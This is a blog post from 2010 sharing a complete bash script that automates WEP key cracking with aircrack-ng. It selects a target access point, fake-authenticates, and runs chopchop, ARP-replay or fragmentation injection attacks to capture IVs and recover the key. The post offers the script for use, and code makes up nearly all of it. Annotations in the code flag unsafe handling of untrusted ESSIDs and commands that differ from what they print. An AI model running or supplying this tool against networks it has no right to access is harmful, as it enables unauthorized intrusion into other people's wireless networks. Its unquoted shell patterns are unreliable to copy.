Jul 10, 2010
 

I thought I would post my bash WEP cracking script. I made this on the BackTrack 4 final Linux distro, which is Ubuntu-based; it uses aircrack-ng and a subdirectory called data.

This script will be of most interest to people who use multiple wireless interfaces to capture. It lets you test each card's reception and specify which card does the injection and which are simply there to listen.

It implements all of the aircrack attacks against WEP hubs, and I have had success with all of them.

If I get interested in WPA cracking I’ll post another script.

# Kill every process whose name contains "air" (meant for the aircrack-ng
# tools this script starts). The match is a plain substring on `ps -A`
# output, so any unrelated process with "air" in its name is killed too.
# `^[0-9]+` only matches a PID that starts in column 1; ps right-aligns the
# PID column, so PIDs padded with leading spaces produce no match and those
# processes are left running — verify on the system this runs on.
kill_air() {
	kill `ps -A | grep air | grep -o -E '^[0-9]+'`
}

# Interactive driver around airodump-ng / aireplay-ng / aircrack-ng.
# Flow: pick injection + receiver interfaces -> put all wireless interfaces
# into monitor mode -> capture to data/stations-01.csv -> pick a target ESSID
# from that CSV -> run the chosen attack in spawned `terminator` windows.
# Every value read from the user (`answer`) and from the capture CSV
# (ESSID, BSSID, CHANNEL) is interpolated unquoted into command lines and
# file paths (e.g. data/$ESSID.pkt). The ESSID in particular comes from
# over-the-air beacons, i.e. it is untrusted input to this shell; a name
# containing spaces, globs or shell metacharacters changes what is executed.
# Requires privileges to run ifconfig/iwconfig/airodump-ng (presumably root).
airodump_options="-a --write data/stations --beacons --output-format csv"
# Interface names from iwconfig, one per line, each with a trailing comma ...
cap=`iwconfig | grep -o -E '^\w+' | sed 's/$/,/g'`
# ... joined into a single comma-separated list ("wlan0,wlan1") by letting
# `echo $cap` collapse the newlines, then stripping the last comma and spaces.
cap=`echo $cap | sed 's/,$//' | sed 's/ //g'`
clear
echo "Trips WEP cracking script"
echo -n "http://www.somedodgywebsite.com/wp/software/wep-cracking-with-aircrack/"
airmon-ng
echo "Select injection interface"
# `select` over the list with commas turned back into spaces.
select opt in `echo $cap | sed 's/,/ /g'`
do
	inj=$opt
	# Hardware address of the injection interface, taken from the ifconfig
	# line that contains the interface name; dashes are normalised to colons.
	# `grep "$inj"` is a substring match, so "wlan1" also matches "wlan10".
	MAC=`ifconfig | grep "$inj" | grep -o -E '[0-9A-F-]+[ ]+$' | cut -c 1-17 | sed 's/-/:/g'`
	echo "DEBUG:MAC:$MAC"
	break
done

echo ""; echo "Select your best receiver"
select opt in `echo $cap | sed 's/,/ /g'`
do
	TRUMPET=$opt
	break
done
echo ""; echo -n "Just WEP? (y/n)[y] "
read answer
if [ "$answer" != "n" ]
then
	airodump_options="$airodump_options --encrypt WEP"
fi
echo ""; echo -n "Select channel (1-13)[all] "
read answer
# Whatever was typed is passed straight to airodump-ng as the channel value.
if [ "$answer" != "" ]
then
	channel_options="--channel $answer"
fi
echo ""; echo "Setting capture cards"
# Put every listed interface into monitor mode. Failures of the last three
# iwconfig calls are silently discarded (stdout and stderr to /dev/null).
for int in `echo $cap | sed 's/,/ /g'`
do
	ifconfig $int down
	iwconfig $int rate 1M
	iwconfig $int mode monitor
	iwconfig $int key off >/dev/null 2>&1
	iwconfig $int txpower 16 >/dev/null 2>&1
	iwconfig $int power off >/dev/null 2>&1
done
echo -n "Check individual card reception (y/n)[n] "
read answer
if [ "$answer" = "y" ]
then
	# One terminator window per interface, stacked 150px apart vertically.
	y=1
	for int in `echo $cap | sed 's/,/ /g'`
	do
		terminator --geometry 1200x200+1+$y --command "airodump-ng $airodump_options $channel_options $int" &
		y=$(($y+150))
	done
	echo -n "Happy with individual reception (y/n)[y] "
	read answer
	if [ "$answer" = "n" ]
	then
		exit
	fi
fi
# Previous capture files are removed unconditionally (no prompt, no -f, so a
# missing file prints an error and the script carries on).
rm data/stations*
# Foreground capture over all interfaces; the script resumes once it exits.
airodump-ng $airodump_options $channel_options $cap
echo -n "Found suitable network to attack?(y/n)[y] "
read answer
if [ "$answer" = "n" ]
then
	echo "Bummer :("
	exit
fi
echo "Select ESSID target"
# Column 14 of the airodump CSV, skipping the first two lines; rows whose
# ESSID has no word character are dropped. Splitting on "," means an ESSID
# that itself contains a comma is cut at that comma. The unquoted backtick
# expansion also word-splits ESSIDs on whitespace.
select target in `awk -F , '{if (NR>2) print $14}' data/stations-01.csv | grep -E '\w'`
do
	ESSID=$target
	break
done
# First CSV line containing the ESSID as a substring/regex (not a whole-field
# match): an ESSID that is a prefix of another, or that contains regex
# metacharacters such as "." or "*", can select the wrong row.
BSSID=`grep -m 1 "$ESSID" data/stations-01.csv | awk -F , '{print $1}'`
CHANNEL=`grep -m 1 "$ESSID" data/stations-01.csv | awk -F , '{print $4}' | grep -o -E '[0-9]+'`
ENCRYPT=`grep -m 1 "$ESSID" data/stations-01.csv | awk -F , '{print $6}'`
echo ""
echo "ESSID = $ESSID"
echo "BSSID = $BSSID"
echo "Channel = $CHANNEL"
echo "Encryption = $ENCRYPT"
echo "Injection Interface = $inj"
echo "Injection MAC = $MAC"
echo "Best Reception Interface = $TRUMPET"
echo ""
echo -n "Proceed with attack? (y/n)[y] "
read answer
if [ "$answer" = "n" ]
then
	echo "Goobye :)"
	exit
fi
echo "Setting interfaces for attack"
# Re-apply monitor mode and lock every interface to the target's channel.
for int in `echo $cap | sed 's/,/ /g'`
do
	ifconfig $int down
	iwconfig $int rate 1M
	iwconfig $int mode monitor
	iwconfig $int power off >/dev/null 2>&1
	iwconfig $int channel $CHANNEL
done
ifconfig $inj down
#ignore : Tests have shown no difference between 1M and 54M on ar9170usb
iwconfig $inj rate 1M
iwconfig $inj channel $CHANNEL
echo ""; echo "-> aireplay-ng --fakeauth=60 -a $BSSID -e $ESSID -q 10 -h $MAC -i $TRUMPET $inj"
echo "Associating..."
# Runs in a separate window; its exit status is never checked, hence the
# fixed 10-second wait and the manual-retry hint below.
terminator --geometry 1200x100+1+1 --command "aireplay-ng --fakeauth=60 -a $BSSID -e $ESSID -q 10 -h $MAC -i $TRUMPET $inj" &
echo ""; echo "Waiting 10 seconds for association..."
sleep 10
echo "If association failed start it again in another console using the aforementioned command"
echo "Press enter to continue with cracking"
read answer
echo "Choose attack method"
# The three echos are chained with "&" (backgrounded), not ";" — they run
# concurrently, so the menu order is not guaranteed to be CHOPCHOP/ARP/Fragment.
select attack in `echo "CHOPCHOP" & echo "ARP" & echo "Fragment"`; do echo "$attack Selected"; echo ""; break; done
if [ "$attack" = "Fragment" ]
then
	# Stale artefacts from an earlier run, removed without -f.
	rm fragment*.xor
	rm replay_src*.cap
	echo ""
	echo "-> aireplay-ng --fragment -a $BSSID -e $ESSID -h $MAC $inj"
	aireplay-ng --fragment -a $BSSID -e $ESSID -h $MAC $inj
	echo ""
	echo "-> packetforge-ng --arp -a $BSSID -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment* -w data/$ESSID.pkt"
	packetforge-ng --arp -a $BSSID -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment* -w data/$ESSID.pkt
	echo ""
	# NOTE: the echoed command says -x 200 but the command actually run
	# below uses -x 100; the printed line does not match what executes.
	echo "-> aireplay-ng --interactive -F -r data/$ESSID.pkt -x 200 -h $MAC -b $BSSID $inj"
	aireplay-ng --interactive -F -r data/$ESSID.pkt -x 100 -h $MAC -b $BSSID $inj &
	echo ""
	echo "-> airodump-ng --ivs --write data/$ESSID --bssid $BSSID --channel $CHANNEL $cap"
	terminator --geometry 1200x300+1+100 --command "airodump-ng --ivs --write data/$ESSID --bssid $BSSID --channel $CHANNEL $cap" &
	echo ""
	echo "-> aircrack-ng -P2 -b $BSSID -l data/$ESSID.key.txt data/$ESSID*.ivs"
	# The whole --command string is inside double quotes, so every $VAR in it
	# (including the ' $ESSID' inside single quotes) is expanded by this shell
	# before terminator starts; the recovered key file then gets the ESSID
	# appended after the user presses enter.
	terminator --geometry 1200x200+1+300 --command "echo 'Cracking stating in 10 seconds' ; sleep 10 ; aircrack-ng -P2 -b $BSSID -l data/$ESSID.key.txt data/$ESSID*.ivs ; echo 'Press enter to exit' ; read answer ; echo ' $ESSID' >> data/$ESSID.key.txt"
	# Runs immediately after the windows are spawned (they were backgrounded),
	# so it may kill the tools just started rather than only stale ones.
	kill_air
fi
if [ "$attack" = "ARP" ]
then
	echo "-> aireplay-ng --arpreplay -a $BSSID -e $ESSID -h $MAC -x 100 -i $TRUMPET $inj"
	aireplay-ng --arpreplay -a $BSSID -e $ESSID -h $MAC -x 100 -i $TRUMPET $inj &
	echo "-> airodump-ng --ivs --write data/$ESSID --bssid $BSSID --channel $CHANNEL $cap"
	terminator --geometry 1200x300+1+100 --command "airodump-ng --ivs --write data/$ESSID --bssid $BSSID --channel $CHANNEL $cap" &
	echo "-> aircrack-ng -P2 -b $BSSID -l data/$ESSID.key.txt data/$ESSID*.ivs"
	# Same expansion caveat as the Fragment branch: $VARs in the --command
	# string are expanded by this shell at launch time.
	terminator --geometry 1200x200+1+300 --command "echo 'Press enter to start cracking, you must have started sending packets.' ; read answer ; aircrack-ng -P2 -b $BSSID -l data/$ESSID.key.txt data/$ESSID*.ivs ; echo 'Press enter to exit' ; read answer ; echo ' $ESSID' >> data/$ESSID.key.txt"
	# Same timing caveat as the Fragment branch.
	kill_air
fi

if [ "$attack" = "CHOPCHOP" ]
then
	# Foreground only; no capture/crack windows are started for this branch.
	echo ""; echo "-> aireplay-ng --chopchop -a $BSSID -e $ESSID -h $MAC -i $TRUMPET $inj"
	aireplay-ng --chopchop -a $BSSID -e $ESSID -h $MAC -i $TRUMPET $inj
fi
echo ""; echo "These 'air*' processes are still running:"
# Unquoted backtick expansion: the ps lines are collapsed onto one line.
echo `ps -A | grep air`

